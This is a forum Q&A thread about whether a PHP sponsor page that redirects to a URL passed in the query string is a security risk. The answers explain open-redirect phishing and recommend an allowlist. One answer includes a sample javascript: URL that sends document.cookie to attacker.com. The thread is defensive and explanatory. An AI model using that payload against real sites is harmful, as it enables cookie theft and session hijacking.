views:

209

answers:

3

I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)

A: 

This is definitely a security risk. You should avoid using in-URL variables when security is involved.

While nothing is totally secure, this is a much better way of handling this issue: http://www.webmasterworld.com/forum88/2910.htm

PHLAK
Just out of curiosity, why do you label this a security risk? The reason I ask is that the OP explicitly stated that there is no logon information at risk.
Chris Lively
A: 

If sponsor.php allows any value into RedirectPage AND ads imply an endorsement, or encourage people to think that they are on the right track you would be opening it to be part of a phishing attack. What's worse, you would probably be profiting from those attacks, which would likely make people rather displeased.

Keeping a list of permitted URLs (or patterns that they can follow) would go a long way to prevent problems.

acrosman
+8  A: 

It's a big problem. If I send you a link that looks like this:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

The hole here is your reputation. Blind redirects like this are dangerous.

And that's just one hole. How about this?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.

Tom Ritter
Excellent. :)abcd
landon9720